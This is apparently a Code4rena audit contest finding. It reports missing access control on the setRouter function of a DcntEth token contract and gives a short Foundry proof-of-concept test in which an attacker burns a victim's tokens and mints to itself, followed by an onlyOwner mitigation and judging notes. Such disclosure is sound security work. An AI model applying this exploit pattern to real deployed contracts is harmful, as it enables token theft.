Platform: Code4rena
Start Date: 19/01/2024
Pot Size: $36,500 USDC
Total HM: 9
Participants: 113
Period: 3 days
Judge: 0xsomeone
Id: 322
League: ETH
Rank: 73/113
Findings: 1
Award: $0.12
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: NPCsCorp
Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad
0.1172 USDC - $0.12
The DcntEth contract contains a critical security flaw due to missing access control on the setRouter function. An attacker can exploit this by setting themselves as the router and then using the burn and mint functions to arbitrarily burn tokens from any address and mint tokens to any address. This vulnerability could lead to unauthorized token manipulation, significantly compromising the integrity of the token supply and potentially leading to financial losses for token holders.
The vulnerability sequence can be broken down as follows:
setRouter to set themselves as the router.contract DcntEth is OFTV2 { // ... function setRouter(address _router) public { router = _router; } // ... }
Due to the lack of access control, any user, including an attacker, can call this function.
Unauthorized Token Burning and Minting: Once the attacker has set themselves as the router, they can then call burn and mint to manipulate token balances. The attacker can burn tokens from any address. The attacker can mint tokens to any address, including their own.
Foundry POC
contract TestDcntEth is DSTest { DcntEth dcntEth; address attacker = address(0x1234); address victim = address(0x5678); function setUp() public { dcntEth = new DcntEth(/* LayerZeroEndpoint address */); dcntEth.setRouter(attacker); // Attacker sets themselves as the router } function testUnauthorizedTokenManipulation() public { // Attacker burns tokens from the victim's address vm.prank(attacker); dcntEth.burn(victim, 1000); // Attacker mints tokens to their own address vm.prank(attacker); dcntEth.mint(attacker, 1000); // Assertions to validate the attack assertEq(dcntEth.balanceOf(victim), 0); // Victim's balance should be reduced assertEq(dcntEth.balanceOf(attacker), 1000); // Attacker's balance should increase } }
manual, foundry
To mitigate this issue, the setRouter function should include an access control mechanism, such as the onlyOwner modifier
Access Control
#0 - c4-pre-sort
2024-01-24T02:05:46Z
raymondfam marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-01-24T02:05:54Z
raymondfam marked the issue as duplicate of #14
#2 - c4-judge
2024-02-03T13:28:31Z
alex-ppg marked the issue as satisfactory